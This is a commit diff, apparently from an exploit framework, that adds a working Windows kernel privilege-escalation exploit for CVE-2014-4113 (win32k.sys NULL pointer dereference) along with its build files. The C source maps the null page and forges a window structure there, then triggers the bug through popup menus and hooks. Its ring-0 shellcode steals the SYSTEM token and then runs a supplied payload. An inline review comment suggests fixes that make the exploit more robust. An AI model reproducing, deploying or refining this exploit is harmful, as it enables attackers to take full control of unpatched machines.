Land #4064, Win32k.sys NULL Pointer Dereference
04a99f09bb
Binary file not shown.
Binary file not shown.
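--- /dev/null
+++ b/PATH_NOT_SHOWN/.gitignore
@@ -0,0 +1,151 @@
+## Ignore Visual Studio temporary files, build results, and
+## files generated by popular Visual Studio add-ons.
+
+# User-specific files
+*.suo
+*.user
+*.sln.docstates
+
+# Build results
+
+[Dd]ebug/
+[Rr]elease/
+x64/
+build/
+[Bb]in/
+[Oo]bj/
+
+# Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets
+!packages/*/build/
+
+# MSTest test Results
+[Tt]est[Rr]esult*/
+[Bb]uild[Ll]og.*
+
+*_i.c
+*_p.c
+*.ilk
+*.meta
+*.obj
+*.pch
+*.pdb
+*.pgc
+*.pgd
+*.rsp
+*.sbr
+*.tlb
+*.tli
+*.tlh
+*.tmp
+*.tmp_proj
+*.log
+*.vspscc
+*.vssscc
+.builds
+*.pidb
+*.log
+*.scc
+
+# Visual C++ cache files
+ipch/
+*.aps
+*.ncb
+*.opensdf
+*.sdf
+*.cachefile
+
+# Visual Studio profiler
+*.psess
+*.vsp
+*.vspx
+
+# Guidance Automation Toolkit
+*.gpState
+
+# ReSharper is a .NET coding add-in
+_ReSharper*/
+*.[Rr]e[Ss]harper
+
+# TeamCity is a build add-in
+_TeamCity*
+
+# DotCover is a Code Coverage Tool
+*.dotCover
+
+# NCrunch
+*.ncrunch*
+.*crunch*.local.xml
+
+# Installshield output folder
+[Ee]xpress/
+
+# DocProject is a documentation generator add-in
+DocProject/buildhelp/
+DocProject/Help/*.HxT
+DocProject/Help/*.HxC
+DocProject/Help/*.hhc
+DocProject/Help/*.hhk
+DocProject/Help/*.hhp
+DocProject/Help/Html2
+DocProject/Help/html
+
+# Click-Once directory
+publish/
+
+# Publish Web Output
+*.Publish.xml
+*.pubxml
+
+# NuGet Packages Directory
+## TODO: If you have NuGet Package Restore enabled, uncomment the next line
+#packages/
+
+# Windows Azure Build Output
+csx
+*.build.csdef
+
+# Windows Store app package directory
+AppPackages/
+
+# Others
+sql/
+*.Cache
+ClientBin/
+[Ss]tyle[Cc]op.*
+~$*
+*~
+*.dbmdl
+*.[Pp]ublish.xml
+*.pfx
+*.publishsettings
+
+# RIA/Silverlight projects
+Generated_Code/
+
+# Backup & report files from converting an old project file to a newer
+# Visual Studio version. Backup files are not needed, because we have git ;-)
+_UpgradeReport_Files/
+Backup*/
+UpgradeLog*.XML
+UpgradeLog*.htm
+
+# SQL Server files
+App_Data/*.mdf
+App_Data/*.ldf
+
+# =========================
+# Windows detritus
+# =========================
+
+# Windows image file caches
+Thumbs.db
+ehthumbs.db
+
+# Folder config file
+Desktop.ini
+
+# Recycle Bin used on file shares
+$RECYCLE.BIN/
+
+# Mac crap
+.DS_Store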
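--- /dev/null
+++ b/PATH_NOT_SHOWN/cve-2014-4113.sln
@@ -0,0 +1,28 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Express 2013 for Windows Desktop
+VisualStudioVersion = 12.0.30723.0
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2014-4113", "cve-2014-4113\cve-2014-4113.vcxproj", "{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}"
+EndProject
+Global
+GlobalSection(SolutionConfigurationPlatforms) = preSolution
+Debug|Win32 = Debug|Win32
+Debug|x64 = Debug|x64
+Release|Win32 = Release|Win32
+Release|x64 = Release|x64
+EndGlobalSection
+GlobalSection(ProjectConfigurationPlatforms) = postSolution
+{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.ActiveCfg = Debug|Win32
+{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|Win32.Build.0 = Debug|Win32
+{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|x64.ActiveCfg = Debug|x64
+{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Debug|x64.Build.0 = Debug|x64
+{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.ActiveCfg = Release|Win32
+{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|Win32.Build.0 = Release|Win32
+{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|x64.ActiveCfg = Release|x64
+{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}.Release|x64.Build.0 = Release|x64
+EndGlobalSection
+GlobalSection(SolutionProperties) = preSolution
+HideSolutionNode = FALSE
+EndGlobalSection
+EndGlobal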
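--- /dev/null
+++ b/PATH_NOT_SHOWN/cve-2014-4113.c
@@ -0,0 +1,490 @@
+#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
+#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
+#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
+
+// Purloined from ntstatus.h
+#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) // ntsubauth
+
+#define WIN32_NO_STATUS
+#include <windows.h>
+#undef WIN32_NO_STATUS
+
+#ifndef _NTDEF_
+typedef __success(return >= 0) LONG NTSTATUS;
+typedef NTSTATUS *PNTSTATUS;
+#endif
+
+#define DEBUGGING FALSE
+
+#ifdef _M_X64
+typedef unsigned __int64 QWORD;
+typedef QWORD *PQWORD;
+#endif
+
+int WndProcClue = 0;
+int HookCallbackClue = 0;
+WNDPROC lpPrevWndFunc;
+DWORD MyProcessId = 0;
+DWORD OffsetWindows = 0;
+
+typedef NTSTATUS(NTAPI *lNtAllocateVirtualMemory)(
+IN HANDLE ProcessHandle,
+IN PVOID *BaseAddress,
+IN PULONG ZeroBits,
+IN PSIZE_T RegionSize,
+IN ULONG AllocationType,
+IN ULONG Protect
+);
+
+typedef NTSTATUS(NTAPI *lPsLookupProcessByProcessId)(
+IN HANDLE ProcessId,
+OUT PVOID Process
+);
+
+typedef NTSTATUS(NTAPI *lZwQuerySystemInformation)(
+_In_ DWORD SystemInformationClass,
+_Inout_ PVOID SystemInformation,
+_In_ ULONG SystemInformationLength,
+_Out_opt_ PULONG ReturnLength
+);
+
+typedef struct _SYSTEM_MODULE {
+HANDLE Reserved1;
+PVOID Reserved2;
+PVOID ImageBaseAddress;
+ULONG ImageSize;
+ULONG Flags;
+USHORT Id;
+USHORT Rank;
+USHORT w018;
+USHORT NameOffset;
+BYTE Name[256];
+} SYSTEM_MODULE, *PSYSTEM_MODULE;
+
+
+typedef struct _SYSTEM_MODULE_INFORMATION {
+ULONG ModulesCount;
+SYSTEM_MODULE Modules[0];
+} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
+
+lPsLookupProcessByProcessId pPsLookupProcessByProcessId = NULL;
+lNtAllocateVirtualMemory pNtAllocateVirtualMemory = NULL;
+
+
+long CALLBACK HookCallbackTwo(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
+{
+EndMenu();
+return -5;
+}
+
+LRESULT CALLBACK HookCallback(int code, WPARAM wParam, LPARAM lParam) {
+#ifdef _M_X64
+if (*(DWORD *)(lParam + 16) == 0x1EB && !HookCallbackClue)
+#else
+if (*(DWORD *)(lParam + 8) == 0x1EB && !HookCallbackClue)
+#endif
+{
+HookCallbackClue = 1;
+if (UnhookWindowsHook(WH_CALLWNDPROC, HookCallback)) {
+#ifdef _M_X64
+lpPrevWndFunc = (WNDPROC)SetWindowLongPtr(*(HWND *)(lParam + 24), GWLP_WNDPROC, (ULONG_PTR)HookCallbackTwo);
+#else
+lpPrevWndFunc = (WNDPROC)SetWindowLongA(*(HWND *)(lParam + 12), GWLP_WNDPROC, (LONG)HookCallbackTwo);
+#endif
+}
+}
+return CallNextHookEx(0, code, wParam, lParam);
+}
+
+LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
+if (msg == 289 && WndProcClue != 1) {
+WndProcClue = 1;
+PostMessageA(hwnd, 256, 40, 0);
+PostMessageA(hwnd, 256, 39, 0);
+PostMessageA(hwnd, 513, 0, 0);
+}
+return DefWindowProc(hwnd, msg, wParam, lParam);
+}
+
+#ifdef _M_X64
+QWORD MyPtiCurrent(void) {
+void *teb = (void *)__readgsqword(0x30);
+QWORD Win32ThreadInfo = (QWORD)*((PQWORD)((PBYTE)teb + 0x78));
+
+return Win32ThreadInfo;
+}
+#else
+DWORD __stdcall MyPtiCurrent() {
+__asm {
+mov eax, fs : 18h
+mov eax, [eax + 40h]
+}
+}
+#endif
+
+int _stdcall shellcode_ring0(int one, int two, int three, int four) {
+void *my_process_info = NULL;
+void *system_info = NULL;
+
+pPsLookupProcessByProcessId((HANDLE)MyProcessId, &my_process_info);
+pPsLookupProcessByProcessId((HANDLE)4, &system_info);
+
+*(PDWORD)((PBYTE)my_process_info + OffsetWindows) = *(PDWORD)((PBYTE)system_info + OffsetWindows);
+
+return 0;
+}
+
+void
+LogMessage(char* pszFormat, ...) {
+if (DEBUGGING != TRUE) {
+return;
+}
+static char s_acBuf[2048];
+va_list args;
+va_start(args, pszFormat);
+vsprintf(s_acBuf, pszFormat, args);
+printf("%s\n", s_acBuf);
+OutputDebugString(s_acBuf);
+va_end(args);
+}
+
+DWORD WINAPI ExecutePayload(LPVOID lpPayload) {
+VOID(*lpCode)() = (VOID(*)())lpPayload;
+lpCode();
+return ERROR_SUCCESS;
+}
+
+void Win32kNullPage(LPVOID lpPayload) {
+HWND hWnd;
+WNDCLASSA WndClass;
+LPBYTE promise_land = NULL;
+HMODULE hNtdll = NULL;
+HMODULE ntkrnl = NULL;
+NTSTATUS status;
+PULONG pSystemInfoBuffer = NULL;
+lZwQuerySystemInformation pZwQuerySystemInformation = NULL;
+ULONG SystemInfoBufferSize = 0;
+char nt_name[256];
+PVOID nt_base;
+OSVERSIONINFOA VersionInformation;
+
+// Getting Windows version
+LogMessage("[*] Getting Windows version...");
+memset(&VersionInformation, 0, sizeof(OSVERSIONINFOA));
+VersionInformation.dwOSVersionInfoSize = 148;
+if (!GetVersionExA(&VersionInformation)) {
+LogMessage("[!] Failed to get windows version");
+return;
+}
+
+#ifdef _M_X64
+if (VersionInformation.dwMajorVersion == 6 && VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows 7 SP1
+LogMessage("[*] Windows 6.1 found...");
+OffsetWindows = 0x208;
+}
+#else
+if (VersionInformation.dwMajorVersion == 6) {
+if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows 7 SP1
+LogMessage("[*] Windows 6.1 found...");
+OffsetWindows = 0xf8;
+}
+else if (!VersionInformation.dwMinorVersion) {
+LogMessage("[*] Windows 6.0 found..."); // Ex: Windows 2008 R2
+OffsetWindows = 0xe0;
+}
+else {
+LogMessage("[!] Unsupported Windows 6.%d found, only 6.0 and 6.1 supported atm", VersionInformation.dwMinorVersion);
+return;
+}
+}
+else if (VersionInformation.dwMajorVersion == 5) {
+if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 1) { // Ex: Windows XP SP3
+LogMessage("[*] Windows 5.1 found...");
+OffsetWindows = 0xc8;
+}
+else if (VersionInformation.dwMinorVersion && VersionInformation.dwMinorVersion == 2) { // Ex: Windows 2003 SP2
+LogMessage("[*] Windows 5.2 found...");
+OffsetWindows = 0xd8;
+}
+else {
+LogMessage("[!] Unsupported Windows 5 found, only 5.1 and 5.2 supported atm");
+return;
+}
+}
+#endif
+else {
+LogMessage("[!] Major Version %d found, not supported", VersionInformation.dwMajorVersion);
+return;
+}
+
+// Solve symbols
+LogMessage("[*] Solving symbols...");
+
+hNtdll = LoadLibraryA("ntdll");
+if (hNtdll == NULL) {
+LogMessage("[!] Failed to Load ntdll...");
+return;
+}
+
+pZwQuerySystemInformation = (lZwQuerySystemInformation)GetProcAddress(hNtdll, "ZwQuerySystemInformation");
+if (pZwQuerySystemInformation == NULL) {
+LogMessage("[!] Failed to solve ZwQuerySystemInformation");
+return;
+}
+
+pNtAllocateVirtualMemory = (lNtAllocateVirtualMemory)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
+if (pNtAllocateVirtualMemory == NULL) {
+LogMessage("[!] Failed to solve NtAllocateVirtualMemory");
+return;
+}
+
+LogMessage("[*] Requesting Kernel loaded modules...");
+
+status = pZwQuerySystemInformation(11, &SystemInfoBufferSize, 0, &SystemInfoBufferSize);
+
+if (SystemInfoBufferSize == 0) {
+LogMessage("[!] Requesting pZwQuerySystemInformation required length failed");
+return;
+}
+else {
+LogMessage("[*] pZwQuerySystemInformation required length %d", SystemInfoBufferSize);
+}
+
+pSystemInfoBuffer = (PULONG)LocalAlloc(LMEM_ZEROINIT, SystemInfoBufferSize);
+if (pSystemInfoBuffer == NULL) {
+LogMessage("[!] Allocation for SystemInfo failed");
+return;
+}
+
+status = pZwQuerySystemInformation(11, pSystemInfoBuffer, SystemInfoBufferSize, &SystemInfoBufferSize);
+
+if (status != STATUS_SUCCESS) {
+LogMessage("[!] Requesting kernel modules through ZwQuerySystemInformation failed");
+return;
+}
+
+
+LogMessage("[*] Parsing SYSTEM_INFO...");
+
+SYSTEM_MODULE_INFORMATION *smi = (SYSTEM_MODULE_INFORMATION *)pSystemInfoBuffer;
+
+LogMessage("[*] %d Kernel modules found\n", smi->ModulesCount);
+
+memset(nt_name, 0, 256);
+
+int i = 0;
+while (i < smi->ModulesCount) {
+SYSTEM_MODULE *sm = (SYSTEM_MODULE *)(smi->Modules + i);
+LogMessage("[*] Checking module %s", sm->Name);
+if (strstr((char *)sm->Name, ".exe")) {
+char *start = strstr((char *)sm->Name, "nt");
+if (start != NULL) {
+nt_base = sm->ImageBaseAddress;
+strncpy_s(nt_name, 256, start, _TRUNCATE);
+break;
+}
+}
+i++;
+}
+
+if (nt_name == NULL) {
+LogMessage("[!] nt not found");
+return;
+}
+else {
+LogMessage("[*] Good! nt found as %s at 0x%08x", nt_name, nt_base);
+}
+
+ntkrnl = LoadLibraryA(nt_name);
+
+LogMessage("[*] %s loaded in userspace at: %08x\n", nt_name, ntkrnl);
+
+pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)GetProcAddress(ntkrnl, "PsLookupProcessByProcessId");
+
+if (pPsLookupProcessByProcessId == NULL) {
+LogMessage("[!] Failed to solve PsLookupProcessByProcessId\n");
+return;
+}
+
+#ifdef _M_X64
+pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((QWORD)nt_base + ((QWORD)pPsLookupProcessByProcessId - (QWORD)ntkrnl));
+LogMessage("[*] pPsLookupProcessByProcessId in kernel: %016llx\n", pPsLookupProcessByProcessId);
+#else
+pPsLookupProcessByProcessId = (lPsLookupProcessByProcessId)((DWORD)nt_base + ((DWORD)pPsLookupProcessByProcessId - (DWORD)ntkrnl));
+LogMessage("[*] pPsLookupProcessByProcessId in kernel: %08x\n", pPsLookupProcessByProcessId);
+#endif
+
+MyProcessId = GetCurrentProcessId();
+
+// Register Class
+LogMessage("[*] Registering class...");
+
+memset(&WndClass, 0, sizeof(WNDCLASSA));
+WndClass.lpfnWndProc = WndProc; // Called with CallWindowProc => http://msdn.microsoft.com/en-us/library/windows/desktop/ms633571(v=vs.85).aspx
+WndClass.lpszClassName = "woqunimalegebi";
+
+if (RegisterClassA(&WndClass) == 0) {
+LogMessage("[!] RegisterClassA failed ");
+return;
+}
+
+// Create Window
+LogMessage("[*] Creating window...");
+hWnd = CreateWindowExA(0, "woqunimalegebi", NULL, 0, -1, -1, 0, 0, NULL, NULL, NULL, NULL);
+
+if (hWnd == NULL) {
+LogMessage("[!] CreateWindowExA failed");
+return;
+}
+
+// Making everything ready for exploitation...
+
+LogMessage("[*] Allocating null page...");
+#ifdef _M_X64
+ULONGLONG base_address = 0x00000000fffffffb;
+#else
+DWORD base_address = 1;
+#endif
+SIZE_T region_size = 0x1000;
+ULONG zero_bits = 0;
+HANDLE current_process = NULL;
+
+current_process = GetCurrentProcess();
+
+if (pNtAllocateVirtualMemory(current_process, (LPVOID*)(&base_address), 0, ®ion_size, (MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN), PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS) {
+LogMessage("[!] Failed to allocate null page");
+return;
+}
+
+LogMessage("[*] Getting PtiCurrent...");
+
+#ifdef _M_X64
+ULONGLONG pti = MyPtiCurrent();
+#else
+DWORD pti = MyPtiCurrent();
+#endif
+
+if (pti == 0) {
+LoadLibrary("user32.dll");
+LoadLibrary("gdi32.dll");
+pti = MyPtiCurrent();
+}
+
+if (pti == 0) {
+LogMessage("[!] Filed to get PtiCurrent");
+return;
+}
+else {
+#ifdef _M_X64
+LogMessage("[*] Good! pti 0x%016llx", pti);
+#else
+LogMessage("[*] Good! pti 0x%08x", pti);
+#endif
+}
+
+LogMessage("[*] Creating a fake structure at NULL...");
+
+#ifdef _M_X64
+void *test = NULL;
+(QWORD)test = 0x10000000B;
+*((PQWORD)test) = pti;
+
+/* win32k!tagWND->bServerSideWindowProc = TRUE */
+(QWORD)test = 0x100000025;
+*((PBYTE)test) = 4;
+
+/* win32k!tagWND->lpfnWndProc = &shellcode_ring0 */
+(QWORD)test = 0x10000008B;
+*((PQWORD)test) = &shellcode_ring0;
+#else
+void *test = promise_land + 3;
+/* We need to save this check, otherwise unmapped memory will be dereferenced (blue screen)
+.text:BF8B93F4 02C mov edi, _gptiCurrent
+.text:BF8B93FA 02C cmp edi, [esi + 8];
+.text:BF8B93FD 02C jz loc_BF8B
+*/
+*(LPDWORD)test = pti;
+
+*((LPBYTE)(promise_land + 0x11)) = 0x4;
+
+test = promise_land + 0x5b;
+*(LPDWORD)test = (DWORD)shellcode_ring0;
+#endif
+
+// Exploit!
+
+LogMessage("[*] Triggering vulnerability...");
+HMENU MenuOne = CreatePopupMenu();
+if (MenuOne == NULL) {
+LogMessage("[!] First CreatePopupMenu failed");
+return;
+}
+
+MENUITEMINFOA MenuOneInfo;
+memset(&MenuOneInfo, 0, sizeof(MENUITEMINFOA));
+MenuOneInfo.cbSize = sizeof(MENUITEMINFOA);
+MenuOneInfo.fMask = MIIM_STRING;
+
+if (InsertMenuItemA(MenuOne, 0, TRUE, &MenuOneInfo) != TRUE) {
+LogMessage("[!] First InsertMenuItemA failed");
+DestroyMenu(MenuOne);
+return;
+}
+
+HMENU MenuTwo = CreatePopupMenu();
+if (MenuTwo == NULL) {
+LogMessage("[!] Second CreatePopupMenu failed");
+DestroyMenu(MenuOne);
+return;
+}
+
+MENUITEMINFOA MenuTwoInfo;
+memset(&MenuTwoInfo, 0, sizeof(MENUITEMINFOA));
+MenuTwoInfo.cbSize = sizeof(MENUITEMINFOA);
+MenuTwoInfo.fMask = (MIIM_STRING | MIIM_SUBMENU);
+MenuTwoInfo.dwTypeData = "";
+MenuTwoInfo.cch = 1;
+MenuTwoInfo.hSubMenu = MenuOne;
+if (InsertMenuItemA(MenuTwo, 0, TRUE, &MenuTwoInfo) != TRUE) {
+LogMessage("[!] Second InsertMenuItemA failed");
+DestroyMenu(MenuTwo);
+DestroyMenu(MenuOne);
+return;
+}
+
+if (SetWindowsHookExA(WH_CALLWNDPROC, HookCallback, NULL, GetCurrentThreadId()) == NULL) {
+LogMessage("[!] SetWindowsHookExA failed :-(\n");
+DestroyMenu(MenuTwo);
+DestroyMenu(MenuOne);
+return;
+}
+
+// 'crash' it!
+TrackPopupMenu(MenuTwo, 0, -10000, -10000, 0, hWnd, NULL);
+
+// If everything worked process should be privileges at this point
+LogMessage("[!] Executing payload...");
+CreateThread(0, 0, ExecutePayload, lpPayload, 0, NULL);
+return;
+}
+
+BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) {
+BOOL bReturnValue = TRUE;
+switch (dwReason) {
+case DLL_QUERY_HMODULE:
+hAppInstance = hinstDLL;
+if (lpReserved != NULL) {
+*(HMODULE *)lpReserved = hAppInstance;
+}
+break;
+case DLL_PROCESS_ATTACH:
+hAppInstance = hinstDLL;
+Win32kNullPage(lpReserved);
+break;
+case DLL_PROCESS_DETACH:
+case DLL_THREAD_ATTACH:
+case DLL_THREAD_DETACH:
+break;
+}
+return bReturnValue;
+};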
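Review bot: `if (nt_name == NULL)` after the module-scan loop in Win32kNullPage can never be true, because `nt_name` is a `char[256]` whose address is always non-null, so when no module name matches the code falls through to `LoadLibraryA` with an empty string and later reads `nt_base`, which is declared without an initializer, in the kernel-address arithmetic under `#ifdef _M_X64`/`#else`. Declare it as `PVOID nt_base = NULL;` and test the outcome of the search instead, `if (nt_name[0] == '\0' || nt_base == NULL) {`, so the `"[!] nt not found"` branch actually fires. The `pSystemInfoBuffer` obtained from `LocalAlloc` is never released on any return path; a `LocalFree(pSystemInfoBuffer);` once `nt_base` and `nt_name` have been copied out of it would close that leak. `ntkrnl` is likewise passed to `GetProcAddress` and used in the pointer arithmetic without a NULL check after `LoadLibraryA(nt_name)`; the existing `pPsLookupProcessByProcessId == NULL` check does catch that failure, but reports it under a misleading message.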
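--- /dev/null
+++ b/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.vcxproj
@@ -0,0 +1,150 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<ItemGroup Label="ProjectConfigurations">
+<ProjectConfiguration Include="Debug|Win32">
+<Configuration>Debug</Configuration>
+<Platform>Win32</Platform>
+</ProjectConfiguration>
+<ProjectConfiguration Include="Debug|x64">
+<Configuration>Debug</Configuration>
+<Platform>x64</Platform>
+</ProjectConfiguration>
+<ProjectConfiguration Include="Release|Win32">
+<Configuration>Release</Configuration>
+<Platform>Win32</Platform>
+</ProjectConfiguration>
+<ProjectConfiguration Include="Release|x64">
+<Configuration>Release</Configuration>
+<Platform>x64</Platform>
+</ProjectConfiguration>
+</ItemGroup>
+<PropertyGroup Label="Globals">
+<ProjectGuid>{6DDC29F1-6AC0-4D8B-AA62-E21B0D7E219B}</ProjectGuid>
+<RootNamespace>cve20144113</RootNamespace>
+</PropertyGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+<ConfigurationType>DynamicLibrary</ConfigurationType>
+<UseDebugLibraries>true</UseDebugLibraries>
+<WholeProgramOptimization>false</WholeProgramOptimization>
+<CharacterSet>MultiByte</CharacterSet>
+<PlatformToolset>v120</PlatformToolset>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+<ConfigurationType>DynamicLibrary</ConfigurationType>
+<UseDebugLibraries>true</UseDebugLibraries>
+<WholeProgramOptimization>false</WholeProgramOptimization>
+<CharacterSet>MultiByte</CharacterSet>
+<PlatformToolset>v120</PlatformToolset>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+<ConfigurationType>DynamicLibrary</ConfigurationType>
+<UseDebugLibraries>false</UseDebugLibraries>
+<WholeProgramOptimization>false</WholeProgramOptimization>
+<CharacterSet>MultiByte</CharacterSet>
+<PlatformToolset>v120</PlatformToolset>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+<ConfigurationType>DynamicLibrary</ConfigurationType>
+<UseDebugLibraries>false</UseDebugLibraries>
+<WholeProgramOptimization>false</WholeProgramOptimization>
+<CharacterSet>MultiByte</CharacterSet>
+<PlatformToolset>v120</PlatformToolset>
+</PropertyGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+<ImportGroup Label="ExtensionSettings">
+</ImportGroup>
+<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+</ImportGroup>
+<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+</ImportGroup>
+<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+</ImportGroup>
+<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+</ImportGroup>
+<PropertyGroup Label="UserMacros" />
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
+</PropertyGroup>
+<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+<IncludePath>../../../ReflectiveDLLInjection/common;$(IncludePath)</IncludePath>
+</PropertyGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+<ClCompile>
+<CompileAs>CompileAsC</CompileAs>
+<WarningLevel>Level3</WarningLevel>
+<Optimization>Disabled</Optimization>
+<FunctionLevelLinking>true</FunctionLevelLinking>
+<IntrinsicFunctions>true</IntrinsicFunctions>
+<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+</ClCompile>
+<Link>
+<GenerateDebugInformation>true</GenerateDebugInformation>
+<OptimizeReferences>true</OptimizeReferences>
+<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
+</Link>
+</ItemDefinitionGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+<ClCompile>
+<CompileAs>CompileAsC</CompileAs>
+<WarningLevel>Level3</WarningLevel>
+<Optimization>Disabled</Optimization>
+<FunctionLevelLinking>true</FunctionLevelLinking>
+<IntrinsicFunctions>true</IntrinsicFunctions>
+<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+</ClCompile>
+<Link>
+<GenerateDebugInformation>true</GenerateDebugInformation>
+<OptimizeReferences>true</OptimizeReferences>
+<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
+</Link>
+</ItemDefinitionGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+<ClCompile>
+<CompileAs>CompileAsC</CompileAs>
+<WarningLevel>Level3</WarningLevel>
+<Optimization>Disabled</Optimization>
+<FunctionLevelLinking>true</FunctionLevelLinking>
+<IntrinsicFunctions>true</IntrinsicFunctions>
+<CompileAs>Default</CompileAs>
+<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+</ClCompile>
+<Link>
+<GenerateDebugInformation>false</GenerateDebugInformation>
+<OptimizeReferences>true</OptimizeReferences>
+<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
+</Link>
+</ItemDefinitionGroup>
+<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+<ClCompile>
+<CompileAs>CompileAsC</CompileAs>
+<WarningLevel>Level3</WarningLevel>
+<Optimization>Disabled</Optimization>
+<FunctionLevelLinking>true</FunctionLevelLinking>
+<IntrinsicFunctions>true</IntrinsicFunctions>
+<CompileAs>Default</CompileAs>
+<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+</ClCompile>
+<Link>
+<GenerateDebugInformation>false</GenerateDebugInformation>
+<OptimizeReferences>true</OptimizeReferences>
+<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
+</Link>
+</ItemDefinitionGroup>
+<ItemGroup>
+<ClCompile Include="cve-2014-4113.c" />
+</ItemGroup>
+<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+<ImportGroup Label="ExtensionTargets">
+</ImportGroup>
+</Project>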
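--- /dev/null
+++ b/PATH_NOT_SHOWN/make.msbuild
@@ -0,0 +1,17 @@
+<?xml version="1.0" standalone="yes"?>
+<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<PropertyGroup>
+<SolutionPath>.\cve-2014-4113.sln</SolutionPath>
+</PropertyGroup>
+
+<Target Name="all" DependsOnTargets="x86" />
+
+<Target Name="x86">
+<Message Text="Building CVE-2014-4113 win32k_null_page x86 Release version" />
+<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
+</Target>
+
+<Target Name="x64">
+<Message Text="CVE-2014-4113 is not supported in x64" />
+</Target>
+</Project>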
